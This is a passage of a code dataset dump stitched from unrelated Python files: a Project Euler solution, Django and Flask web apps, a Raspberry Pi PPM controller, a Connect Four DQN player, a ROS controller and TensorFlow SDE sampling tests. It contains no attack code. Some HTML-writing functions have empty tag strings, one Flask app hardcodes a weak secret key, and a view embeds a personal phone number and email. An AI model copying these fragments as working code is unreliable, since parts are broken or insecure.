So, COLIN would obtain a score of 938 × 53 = 49714.\n\nWhat is the total of all the name scores in the file?\n\"\"\"\n\ndef sum_of_letter_values(string):\n score = 0\n for letter in string:\n # 64 because ord(\"A\") is 65, so this\n # expression gives 1 for \"A\"\n score += (ord(letter) - 64)\n return score\n\n\nwith open('p022_names.txt', 'r') as f:\n names = f.read()\n\nnames = names.split(\",\")\nnames = [i.strip('\\\"') for i in names]\nnames.sort()\n\nsum_of_scores = 0\nfor i, name in enumerate(names):\n pos = i+1\n val = sum_of_letter_values(name)\n\n sum_of_scores += val * pos\n\nprint(sum_of_scores)\n","sub_path":"p1-50/p22/p22.py","file_name":"p22.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25213976","text":"import io\nimport os.path\n\nfrom .remotedocument import RemoteDocument\n\n\nclass HtmlWriter:\n\n def __init__(self, output):\n self.output = output\n\n def write(self, text):\n self.output.write(text)\n\n def writeline(self, line):\n self.write(line + '\\n')\n\n def write_script_tag(self, source, type='text/javascript'):\n line = ''\n self.writeline(line)\n\n def write_meta_tag(self, attributes):\n self.write('')\n \n def write_stylesheet_tag(self, source):\n line = ''\n self.writeline(line)\n\n def include(self, file_path):\n with open(file_path, 'r') as f:\n self.writeline(f.read())\n\n\nclass MainHtml:\n\n @staticmethod\n def _default_translator(writer, app, tag, basedir):\n return\n\n def __init__(self, app, file_path):\n self.app = app\n self.file_path = file_path\n self.basedir = os.path.dirname(__file__)\n\n def translate(self, writer, translator=_default_translator,\n line_processor=None):\n with open(self.file_path, 'r') as input_file:\n for line in input_file:\n if not (line_processor is None):\n line = line_processor(line)\n if line.lstrip().startswith('-->'):\n tag = line.split()[1].strip()\n translator(writer, self.app, tag, 
self.basedir)\n else:\n writer.writeline(line.rstrip('\\r\\n'))\n\n\ndef get_main_html_for_app(app):\n main_html_file_path = get_main_html_file_path(app)\n return MainHtml(app, main_html_file_path)\n\n\ndef get_main_html_file_path(app):\n if hasattr(app, 'main_html_file_path'):\n return app.main_html_file_path\n\n main_dir = os.path.realpath(__file__)\n main_dir = os.path.dirname(main_dir)\n return os.path.join(main_dir, 'main.html')\n\n\ndef generate_main_html_for_server(app, ws_explicit_route, ssl):\n def main_html_translator(writer, app, tag, basedir):\n if tag == 'websocket':\n return\n if tag == 'include':\n if hasattr(app, 'include'):\n for i in app.include:\n writer.write_script_tag(i)\n return\n if tag == 'meta':\n if hasattr(app, 'meta'):\n for m in app.meta:\n writer.write_meta_tag(m.items())\n return\n if tag == 'stylesheets':\n if hasattr(app, 'stylesheets'):\n for s in app.stylesheets:\n writer.write_stylesheet_tag(s)\n return\n writer.include(os.path.join(basedir, tag))\n\n template = get_main_html_for_app(app)\n output = io.StringIO()\n writer = HtmlWriter(output)\n template.translate(writer, main_html_translator)\n main_html = output.getvalue()\n main_html = main_html.replace('__WEBSOCKET__', ws_explicit_route)\n if ssl:\n main_html = main_html.replace('ws://', 'wss://')\n return main_html\n\n\ndef generate_static_main_html(App):\n def main_html_translator(writer, app, tag, basedir):\n if tag == 'include':\n if hasattr(app, 'include'):\n for i in app.include:\n writer.write_script_tag(i)\n return\n if tag == 'meta':\n if hasattr(app, 'meta'):\n for m in app.meta:\n writer.write_meta_tag(m.items())\n return\n if tag in ['js/classy.js', 'js/weba.js']:\n writer.include(os.path.join(basedir, tag))\n return\n if tag == 'websocket':\n writer.writeline('--> ' + tag)\n return\n\n def line_processor(line):\n if line.strip() == '':\n return ''\n return line\n\n template = get_main_html_for_app(App)\n output = io.StringIO()\n writer = HtmlWriter(output)\n 
template.translate(writer, main_html_translator, line_processor)\n main_html = output.getvalue()\n lines = main_html.split('\\n')\n\n static_html = []\n for l in lines:\n if l.lstrip().startswith('-->'):\n rdoc = RemoteDocument()\n app = App()\n app.initialize(remote_document=rdoc, main_html=main_html)\n l = rdoc.pop_all_code()\n static_html.append(l + '\\n')\n return ''.join(static_html)\n\n","sub_path":"webalchemy/mainhtml.py","file_name":"mainhtml.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"553850569","text":"from django.shortcuts import render, HttpResponse, Http404\nfrom MainApp import models\n\nauthor = {'Имя':'Павел','Отчество':'Михайлович','Фамилия':'Захаров','телефон':'8-960-545-86-86','email':'zakharovpm@rambler.ru'}\n\nitems = [\n {\"id\": 1, \"name\": \"Кроссовки abibas\" ,\"quantity\":5},\n {\"id\": 2, \"name\": \"Куртка кожаная\" ,\"quantity\":2},\n {\"id\": 3, \"name\": \"Coca-cola 1 литр\" ,\"quantity\":12},\n {\"id\": 4, \"name\": \"Картофель фри\" ,\"quantity\":0},\n {\"id\": 5, \"name\": \"Кепка\" ,\"quantity\":124},\n]\n\n\n\n\ndef home(request):\n context = {\n \"name\": \"Павел\",\n \"surname\": \"Захаров\",\n \"page_title\":\"Домашняя страница\"\n }\n return render(request,'index.html',context)\n\ndef about(request):\n return HttpResponse(f'Имя:{author[\"Имя\"]}
'\n f'Отчество:{author[\"Отчество\"]}
'\n f'Фамилия:{author[\"Фамилия\"]}
'\n f'телефон:{author[\"телефон\"]}
'\n f'email:{author[\"email\"]}
')\n\ndef get_item(request,id):\n \n item = models.Item.objects.get(pk=id)\n\n try:\n context = {\n \"name\": item.name,\n \"count\": item.count,\n \"brand\": item.brand,\n }\n return render(request, \"item.html\", context)\n except:\n raise Http404\n\ndef get_items(request):\n # _str = \"
    \"\n # for item in items:\n # _str += f\"
  1. {item['name']}
  2. \"\n # _str += \"
\"\n # return HttpResponse(_str)\n items = models.Item.objects.all()\n context = {\"items\": items}\n return render(request,\"items_list.html\",context)\n\n\n","sub_path":"MainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"264661793","text":"# This is a sample Python script.\r\n\r\n# Press Shift+F10 to execute it or replace it with your code.\r\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\r\n\r\n\r\ndef print_hi(name):\r\n # Use a breakpoint in the code line below to debug your script.\r\n print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.\r\n n=[1,1,1,0,0,0,1,1,1,1,1,1,0,0,1,1,1,1,1,0,1]\r\n # n=[0,0,0,0,0,0,0,0]\r\n # n=[1,1,1,1,1]\r\n pstr_one=[]\r\n one =0\r\n # for i in range(len(n)):\r\n # if n[i] == 1:\r\n # one = one +1\r\n # if i == len(n)-1:\r\n # pstr_one.append(one)\r\n # if n[i] == 0:\r\n # if n[i-1] !=0:\r\n # pstr_one.append(one)\r\n # one = 0\r\n # pstr_one.sort(reverse=True)\r\n # if len(pstr_one)!=0:\r\n # k = pstr_one[0]\r\n # else:\r\n # k=0\r\n # print(pstr_one)\r\n # print(k)\r\n result =0\r\n for i in range(len(n)):\r\n if n[i]==0:\r\n one =0\r\n else:\r\n one+=1\r\n result= max(result,one)\r\n\r\n print(result)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Press the green button in the gutter to run the script.\r\nif __name__ == '__main__':\r\n print_hi('PyCharm')\r\n\r\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"pythonProject/count one.py","file_name":"count one.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"326957780","text":"from flask import Flask, request, session, redirect, render_template\nfrom forms import CreateAccountForm, LoginForm, CommentForm\nfrom data import get_user, 
all_users\n\napp = Flask(__name__)\napp.secret_key = 'THIS!IS!A!TERRIBLE!SECRET!KEY'\n\n\n@app.route('/')\ndef home():\n if 'user_id' in session:\n return redirect('/wall')\n else:\n return render_template('home.html')\n\n\n@app.route('/users')\ndef users():\n return render_template('users.html', users=all_users())\n\n\n@app.route('/account/create', methods=['GET', 'POST'])\ndef create_account():\n if request.method == 'GET':\n return render_template('account_create.html', form=CreateAccountForm())\n else:\n form = CreateAccountForm.from_request(request)\n if form.is_valid():\n account = form.create_account()\n session['user_id'] = account['id']\n return redirect(form.success_url)\n else:\n return render_template('account_create.html', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if 'user_id' in session:\n return redirect('/wall')\n elif request.method == 'GET':\n return render_template('login.html', form=LoginForm())\n else:\n form = LoginForm.from_request(request)\n if form.is_valid():\n session['user_id'] = form.user_id\n return redirect('/wall')\n else:\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('user_id', None)\n return redirect('/')\n\n\n@app.route('/wall')\ndef wall():\n if 'user_id' in session:\n return render_template('wall.html', user=get_user(session['user_id']))\n else:\n return redirect('/login')\n\n\n@app.route('/wall/')\ndef other_wall(user_id):\n if 'user_id' in session and session['user_id'] == user_id:\n return redirect('/wall')\n user = get_user(user_id)\n if user:\n return render_template('other_wall.html', user=user)\n else:\n return render_template('user_not_found.html'), 404\n\n\n@app.route('/wall//comment', methods=['GET', 'POST'])\ndef post_comment(user_id):\n if 'user_id' in session:\n current_user = get_user(session['user_id'])\n user = get_user(user_id)\n if user:\n if request.method == 'GET':\n form = CommentForm(wall_owner=user, 
author=current_user)\n return render_template('wall_comment.html', form=form)\n else:\n form = CommentForm.from_request(\n request, wall_owner=user, author=current_user)\n if form.is_valid():\n form.post_comment()\n return redirect('/wall/{}'.format(user_id))\n else:\n return render_template('wall_comment.html', form=form)\n else:\n return render_template('user_not_found.html'), 404\n else:\n return redirect('/login')\n","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"63310349","text":"from ..models import Episode, UserWatchEpisode\nfrom ..infrastructures import ApiCustomException\nfrom ..constant import ErrorDefine\n\n\nclass EpisodeAdapter:\n def __init__(self):\n pass\n\n def save_current_watch_time(self, user, current_time, episode_id):\n try:\n episode = Episode.objects.get(id=episode_id)\n user_watch_episode = UserWatchEpisode.objects.filter(user_id=user, episode_id_id=episode_id)\n\n if user_watch_episode.exists():\n user_watch_episode = user_watch_episode.first()\n user_watch_episode.current_time = current_time\n user_watch_episode.save()\n\n return user_watch_episode\n\n user_watch_episode = UserWatchEpisode(user_id=user, episode_id=episode, current_time=current_time)\n user_watch_episode.save()\n\n return user_watch_episode\n except Episode.DoesNotExist:\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_EXIST)\n\n def get_user_watch_episode_by_user_and_epsiode_id(self, episode, user=None):\n if user is None:\n return None\n\n user_watch_episode = UserWatchEpisode.objects.filter(user_id=user, episode_id=episode)\n\n if user_watch_episode.exists():\n return user_watch_episode.first()\n\n return None\n\n def get_by_id(self, episode_id, user=None):\n try:\n episode = Episode.objects.get(id=episode_id)\n\n episode.user_watch_episode = self.get_user_watch_episode_by_user_and_epsiode_id(episode, user)\n\n return episode\n 
except Episode.DoesNotExist:\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_EXIST)\n\n def get_by_episode_number(self, episode_number, slug, user=None):\n try:\n episode = Episode.objects.filter(number=episode_number, film_id__slug=slug)\n print(episode_number)\n if not episode.exists():\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_FOUND)\n\n episode = episode.first()\n episode.user_watch_episode = self.get_user_watch_episode_by_user_and_epsiode_id(episode, user)\n\n return episode\n except Episode.DoesNotExist:\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_EXIST)\n\n def get_base_by_id(self, episode_id):\n try:\n episode = Episode.objects.get(id=episode_id)\n\n return episode\n except Episode.DoesNotExist:\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_EXIST)","sub_path":"Fifistudy/fifistudy_api/adapter/episode_adapter.py","file_name":"episode_adapter.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"608754746","text":"from threading import Thread\nimport time\nimport ins\ntry:\n import pigpio\nexcept ImportError:\n print('Warning: pigio is NOT imported')\n import mpigpio as pigpio\n\n# @ins.only\n# class Controller(Thread):\n# \"\"\"PPM output controller powered by pigpio\n\n# **Start the pigpio daemon before running: sudo pigpiod**\n\n# Arguments:\n# input_queue -- Queue to trans\n# gpio -- Number of output pin, equivalent to GPIO.BCM (GPIOX)\n# channel -- Number of PPM channel (8 default)\n# frame_ms -- Time interval between frames in microsecond (5 minimum, 20 default)\n\n# Source: https://www.raspberrypi.org/forums/viewtopic.php?t=219531\n# \"\"\"\n\n# def __init__(self, input_queue, gpio, channels=8, frame_ms=20, gpio_sonic=19):\n# Thread.__init__(self)\n# self._input_queue = input_queue\n# self._gpio = gpio\n# self._channels = channels\n# self._pi = ins.get_only(pigpio.pi)\n\n# if not self._pi.connected:\n# print('Error: pigpio is not 
initialized')\n# exit(0)\n\n# self._ppm = PPM(self._pi, self._gpio, channels=channels, frame_ms=frame_ms, gpio_sonic=gpio_sonic)\n# # Default output signal for stablizing\n# self._ppm.update_channels([1500, 1500, 1100, 1500, 1500, 1500, 1500, 1500])\n# self.daemon = 1\n# self.start()\n\n# def run(self):\n# while 1:\n# signals = self._input_queue.get()\n# self._ppm.update_assign(signals)\n@ins.only\nclass PPM(Thread):\n \"\"\"8 channel PPM output powered by pigpio\n\n **Start the pigpio daemon before running: sudo pigpiod**\n\n Arguments:\n pi -- pigpio.pi()\n gpio -- Number of output pin, equivalent to GPIO.BCM (GPIOX)\n channel -- Number of PPM channel (8 default)\n frame_ms -- Time interval between frames in microsecond (5 minimum, 20 default)\n\n Source: https://www.raspberrypi.org/forums/viewtopic.php?t=219531\n \"\"\"\n GAP = 400\n WAVES = 3\n\n def __init__(self, input_queue, gpio, channels=8, frame_ms=20, gpio_sonic=19):\n Thread.__init__(self)\n self.adjust = 1\n self._input_queue = input_queue\n self.pi = ins.get_only(pigpio.pi)\n self.gpio = gpio\n self.gpio_sonic = gpio_sonic\n\n if frame_ms < 5:\n frame_ms = 5\n channels = 2\n elif frame_ms > 100:\n frame_ms = 100\n\n self.frame_ms = frame_ms\n\n self._frame_us = int(frame_ms * 1000)\n self._frame_secs = frame_ms / 1000.0\n\n if channels < 1:\n channels = 1\n elif channels > (frame_ms // 2):\n channels = int(frame_ms // 2)\n\n self.channels = channels\n\n # set each channel to minimum pulse width\n self._widths = [1000] * channels\n\n self._wid = [None]*self.WAVES\n self._next_wid = 0\n\n self.pi.write(gpio, pigpio.LOW)\n self.pi.write(gpio_sonic, pigpio.LOW)\n\n self._update_time = time.time()\n\n self.update_channels([1500, 1500, 1100, 1500, 1500, 1500, 1500, 1500])\n self.daemon = 1\n self.start()\n\n def run(self):\n while 1:\n signals = self._input_queue.get()\n self.update_assign(signals)\n\n def _update(self):\n # 建立waveform\n wf = []\n micros = 0\n for i in self._widths:\n 
wf.append(pigpio.pulse(0, 1 << self.gpio, self.GAP))\n wf.append(pigpio.pulse(1 << self.gpio, 0, i))\n micros += (i+self.GAP)\n wf.append(pigpio.pulse(0, 1 << self.gpio, self.GAP-15))\n # 超音波trig也順便發出\n wf.append(pigpio.pulse(1 << self.gpio_sonic, 0, 15))\n micros += self.GAP\n wf.append(pigpio.pulse(1 << self.gpio, 1 << self.gpio_sonic, self._frame_us-micros))\n\n # 建立wf並傳送出去(嘗試同步)\n self.pi.wave_add_generic(wf)\n wid = self.pi.wave_create()\n self.pi.wave_send_using_mode(wid, pigpio.WAVE_MODE_REPEAT_SYNC)\n self._wid[self._next_wid] = wid\n\n self._next_wid += 1\n if self._next_wid >= self.WAVES:\n self._next_wid = 0\n\n # 等發送完一次之後才能繼續\n remaining = self._update_time + self._frame_secs - time.time()\n if remaining > 0:\n time.sleep(remaining)\n self._update_time = time.time()\n\n wid = self._wid[self._next_wid]\n if wid is not None:\n self.pi.wave_delete(wid)\n self._wid[self._next_wid] = None\n\n def update_assign(self, signals):\n for signal in signals:\n self._widths[signal[0]] = min(max(signal[1], -400), 400)-self.GAP+1500\n self._update()\n\n def update_channel(self, channel, width):\n # self._widths[channel] = width\n self._widths[channel] = width - self.GAP # workaround for singal offset problem\n self._update()\n\n def update_channels(self, widths):\n # self._widths[0:len(widths)] = widths[0:self.channels]\n self._widths[0:len(widths)] = [w - self.GAP for w in widths[0:self.channels]] # workaround for singal offset problem\n self._update()\n\n def cancel(self):\n self.pi.wave_tx_stop()\n for i in self._wid:\n if i is not None:\n self.pi.wave_delete(i)\n\n\nif __name__ == \"__main__\":\n # pi = pigpio.pi()\n # pi.write(6, 1)\n # input('>>>')\n\n # if not pi.connected:\n # exit(0)\n\n # pi.wave_tx_stop() # Start with a clean slate.\n\n # ppm = PPM(pi, 6, frame_ms=20)\n\n # # updates = 0\n # # start = time.time()\n # # for chan in range(8):\n # # for pw in range(1000, 2000, 5):\n # # ppm.update_channel(chan, pw)\n # # updates += 1\n # # end = time.time()\n # 
# secs = end - start\n # # print(\"{} updates in {:.1f} seconds ({}/s)\".format(updates, secs, int(updates/secs)))\n # # time.sleep(2)\n # input()\n\n # ppm.cancel()\n\n # pi.stop()\n pass\n","sub_path":"ver2/ppm.py","file_name":"ppm.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"579329535","text":"from IntCode import runProgram\nfrom copy import deepcopy\n\nf = open('Day19Input.txt')\nfor line in f:\n program = line.strip('\\n').split(',')\n program = [int(n) for n in program]\nf.close()\n\ninitProgram = deepcopy(program)\noutputArea = ''\npointsAffected = 0\nfor x in range(0,50):\n for y in range(0,50):\n inputParameters = [x,y]\n ip = 0\n relativeBase = 0\n halt = False\n while not(halt):\n [program,ip,relativeBase,outputs,halt,waiting] = runProgram(initProgram,ip,relativeBase,inputParameters,'Parameter',False)\n if outputs[0] == 1:\n outputArea += '#'\n pointsAffected += 1\n else:\n outputArea += '.'\n outputArea += '\\n'\n\nprint(pointsAffected)\n\n ","sub_path":"Day19Part1.py","file_name":"Day19Part1.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375855343","text":"import random, time\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimport torch\r\n\r\nfrom utils_plot import plot_state\r\n\r\nUSE_CUDA = False\r\ndtype = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor\r\n\r\n\r\ndef play_game(env, Q):\r\n\r\n # Play game\r\n plt.ion()\r\n plt.figure(figsize=(20, 10))\r\n flag = 1\r\n stats = np.zeros([2, 7])\r\n stats_symm = np.zeros([2, 7])\r\n action=None\r\n while flag:\r\n obs, _ = env.reset(random.randint(0, 1))\r\n done = False\r\n win = False\r\n lose = False\r\n draw = False\r\n while not done:\r\n plt.subplot(2, 1, env.player + 1)\r\n input_to_dqn = torch.from_numpy(obs.transpose(2, 0, 1)).type(dtype).unsqueeze(0)\r\n 
stats[0, :] = Q(input_to_dqn).data.cpu().numpy()\r\n opponent_obs = env.swap_state(player=1)[:, :, :2]\r\n opponent_input_to_dqn = torch.from_numpy(opponent_obs.transpose(2, 0, 1)).type(dtype).unsqueeze(0)\r\n stats[1, :] = Q(opponent_input_to_dqn).data.cpu().numpy()\r\n\r\n input_to_dqn = np.flip(obs.transpose(2, 0, 1), axis=2).copy()\r\n input_to_dqn = torch.from_numpy(input_to_dqn).type(dtype).unsqueeze(0)\r\n stats_symm[0, :] = np.flip(Q(input_to_dqn).data.cpu().numpy(), axis=1)\r\n opponent_obs = env.swap_state(player=1)[:, :, :2]\r\n opponent_input_to_dqn = np.flip(opponent_obs.transpose(2, 0, 1), axis=2).copy()\r\n opponent_input_to_dqn = torch.from_numpy(opponent_input_to_dqn).type(dtype).unsqueeze(0)\r\n stats_symm[1, :] = np.flip(Q(opponent_input_to_dqn).data.cpu().numpy(), axis=1)\r\n plot_state(env.state, 'Game Turn {}'.format(env.turn), action=action, stats=stats, stats_symm=stats_symm)\r\n plt.show()\r\n plt.pause(0.01)\r\n\r\n if env.player == 0:\r\n # Get player action\r\n action = int(input(\"What is your move? 
(Choose from 0 to {})\".format(env.BOARD_W - 1)))\r\n obs, reward, done, _ = env.step(action)\r\n if done:\r\n if reward > 0:\r\n win = True\r\n elif reward < 0:\r\n lose = True\r\n else:\r\n draw = True\r\n else:\r\n # Get opponent action\r\n opponent_obs = env.swap_state(player=1)[:, :, :2]\r\n opponent_input_to_dqn = torch.from_numpy(opponent_obs.transpose(2, 0, 1)).type(dtype).unsqueeze(0)\r\n\r\n tic = time.perf_counter()\r\n with torch.no_grad():\r\n action = Q(opponent_input_to_dqn).data.max(dim=1)[1].cpu().numpy()\r\n print('time: {}'.format(time.perf_counter() - tic))\r\n\r\n obs, reward, done, _ = env.step(action)\r\n if done:\r\n if reward > 0:\r\n lose = True\r\n elif reward < 0:\r\n win = True\r\n else:\r\n draw = True\r\n\r\n plt.subplot(2, 1, 1)\r\n plot_state(env.state, 'Game Turn {}'.format(env.turn), action=action)\r\n plt.show()\r\n plt.pause(0.01)\r\n print(action)\r\n print(reward)\r\n if win:\r\n print('YOU WIN')\r\n if lose:\r\n print('YOU LOSE!')\r\n if draw:\r\n print('DRAW!')\r\n flag = int(input(\"Play again? 
(Choose from 0,1)\"))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from model import DQN_CNN_WIDE_PREDICTION\r\n from utils_save import load_model\r\n from utils_game import Game\r\n\r\n env = Game()\r\n\r\n Q = DQN_CNN_WIDE_PREDICTION()\r\n model_path = './best_model/'\r\n model = 'best_model'\r\n checkpoint_path = model_path + model + '.pth.tar'\r\n params = load_model(Q, checkpoint_path)\r\n print(params)\r\n\r\n def policy(obs):\r\n return Q(obs)\r\n\r\n play_game(env, policy)\r\n","sub_path":"RL/FourInRow/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192606211","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport array\nimport cv2\n\nfrom remote_engine import *\nfrom mi_msgs.msg import Remote\nfrom sensor_msgs.msg import Image\n\n\nfrom cv_bridge import CvBridge, CvBridgeError\n\nclass Remote_controller(object):\n def __init__(self):\n self.remote_pub = rospy.Publisher('remote_messages', Remote, queue_size = 10)\n self.remote_img_pub = rospy.Publisher('remote_img_messages',Image,queue_size = 10)\n self.bridge = CvBridge()\n self.width = 500\n self.height = 500\n self.remote_engine = Remote_engine()\n self.image = self.remote_engine.backbone()\n self.mouse_down = False ###to drag###\n self.cmd = Remote()\n self.image_num = 2 ###remote_controller img, odometory grid map img\n self.total_image = np.zeros((self.height,self.width*self.image_num),dtype=np.uint8)\n\n def img_publish(self):\n #self.image = self.remote_engine.backbone()\n self.cmd, self.image = self.remote_engine.data_transmission()\n img_msgs = self.bridge.cv2_to_imgmsg(self.image,'mono8')\n self.remote_img_pub.publish(img_msgs)\n \n def cmd_publish(self):\n self.remote_pub.publish(self.cmd)\n\n def drag(self,event,x,y,flags,param):\n \n if event == cv2.EVENT_LBUTTONDBLCLK:\n self.remote_engine.insert(x,y)\n self.img_publish()\n self.cmd_publish()\n \n 
###drag mode###\n \n '''\n if event == cv2.EVENT_LBUTTONDOWN:\n self.mouse_down = True\n\n elif event == cv2.EVENT_MOUSEMOVE:\n \n if self.mouse_down:\n if(x < 500 and x >= 0): ###bar limit for safe\n self.remote_engine.insert(x,y)\n self.img_publish()\n self.cmd_publish()\n #print('mouse_moving',x,y)\n\n elif event == cv2.EVENT_LBUTTONUP:\n self.mouse_down = False\n '''\n\n def merge(self,images):\n for index,image in enumerate(images):\n self.total_image[self.height*0:self.height*1,self.width*index:self.width*(index+1)] = image\n return self.total_image\n \n def display(self):\n cv2.namedWindow('remote_controller',cv2.WINDOW_NORMAL)\n cv2.resizeWindow('remote_controller', 500,500)\n cv2.setMouseCallback('remote_controller', self.drag)\n cv2.imshow('remote_controller',self.image)\n cv2.waitKey(1)\n\nif __name__ == '__main__':\n rospy.init_node('remote_controller',anonymous=True)\n remoter = Remote_controller()\n rate = rospy.Rate(50)\n while not rospy.is_shutdown():\n remoter.display()\n rate.sleep()\n\n","sub_path":"src/ui/src/remote_controller.py","file_name":"remote_controller.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"564795995","text":"# Lint as: python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for methods in `milstein_sampling`.\"\"\"\n\nfrom absl.testing import parameterized\n\nimport numpy as 
np\nimport tensorflow.compat.v2 as tf\n\nimport tf_quant_finance as tff\n\nfrom tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import\n\nmilstein_sampling = tff.models.milstein_sampling\neuler_sampling = tff.models.euler_sampling\nrandom = tff.math.random\n\n\n@test_util.run_all_in_graph_and_eager_modes\nclass MilsteinSamplingTest(tf.test.TestCase, parameterized.TestCase):\n\n @parameterized.named_parameters(\n {\n 'testcase_name': 'CustomForLoopWithTimeStep',\n 'watch_params': True,\n 'use_time_step': True,\n }, {\n 'testcase_name': 'WhileLoopWithTimeStep',\n 'watch_params': False,\n 'use_time_step': True,\n },\n {\n 'testcase_name': 'CustomForLoopWithNumSteps',\n 'watch_params': True,\n 'use_time_step': False,\n }, {\n 'testcase_name': 'WhileLoopWithNumSteps',\n 'watch_params': False,\n 'use_time_step': False,\n })\n def test_sample_paths_wiener(self, watch_params, use_time_step):\n \"\"\"Tests paths properties for Wiener process (dX = dW).\"\"\"\n\n def drift_fn(_, x):\n return tf.zeros_like(x)\n\n def vol_fn(_, x):\n return tf.expand_dims(tf.ones_like(x), -1)\n\n times = np.array([0.1, 0.2, 0.3])\n num_samples = 10000\n if watch_params:\n watch_params = []\n else:\n watch_params = None\n if use_time_step:\n time_step = 0.01\n num_time_steps = None\n else:\n time_step = None\n num_time_steps = 30\n paths = milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times,\n num_samples=num_samples,\n seed=42,\n time_step=time_step,\n num_time_steps=num_time_steps,\n watch_params=watch_params)\n self.assertAllEqual(paths.shape.as_list(), [num_samples, 3, 1])\n paths = self.evaluate(paths)\n means = np.mean(paths, axis=0).reshape([-1])\n covars = np.cov(paths.reshape([num_samples, -1]), rowvar=False)\n expected_means = np.zeros((3,))\n expected_covars = np.minimum(times.reshape([-1, 1]), times.reshape([1, -1]))\n self.assertAllClose(means, expected_means, rtol=1e-2, atol=1e-2)\n 
self.assertAllClose(covars, expected_covars, rtol=1e-2, atol=1e-2)\n\n def test_sample_paths_1d(self):\n \"\"\"Tests path properties for 1-dimentional Ito process.\n\n We construct the following Ito process.\n\n ````\n dX = mu * sqrt(t) * dt + (a * t + b) dW\n ````\n\n For this process expected value at time t is x_0 + 2/3 * mu * t^1.5 .\n \"\"\"\n mu = 0.2\n a = 0.4\n b = 0.33\n\n def drift_fn(t, x):\n return mu * tf.sqrt(t) * tf.ones_like(x, dtype=t.dtype)\n\n def vol_fn(t, x):\n del x\n return (a * t + b) * tf.ones([1, 1], dtype=t.dtype)\n\n times = np.array([0.0, 0.1, 0.21, 0.32, 0.43, 0.55])\n num_samples = 10000\n x0 = np.array([0.1])\n paths = self.evaluate(\n milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times,\n num_samples=num_samples,\n initial_state=x0,\n random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,\n time_step=0.01,\n seed=[1, 42]))\n paths_no_zero = self.evaluate(\n milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times[1:],\n num_samples=num_samples,\n initial_state=x0,\n random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,\n time_step=0.01,\n seed=[1, 42]))\n\n with self.subTest('CorrectShape'):\n self.assertAllClose(paths.shape, (num_samples, 6, 1), atol=0)\n means = np.mean(paths, axis=0).reshape(-1)\n expected_means = x0 + (2.0 / 3.0) * mu * np.power(times, 1.5)\n with self.subTest('ExpectedResult'):\n self.assertAllClose(means, expected_means, rtol=1e-2, atol=1e-2)\n with self.subTest('IncludeInitialState'):\n self.assertAllClose(paths[:, 1:, :], paths_no_zero)\n\n def test_sample_bsm(self):\n r\"\"\"Tests path properties for 1-dimensional Black Scholes Merton.\n\n We construct the following Ito process.\n\n ````\n dX = r * X * dt + \\sigma * X * dW\n ````\n\n Note, that we're not testing in log space.\n \"\"\"\n r = 0.5\n sigma = 0.5\n\n def drift_fn(t, x):\n del t\n return r * x\n\n def vol_fn(t, x):\n del t\n return sigma * 
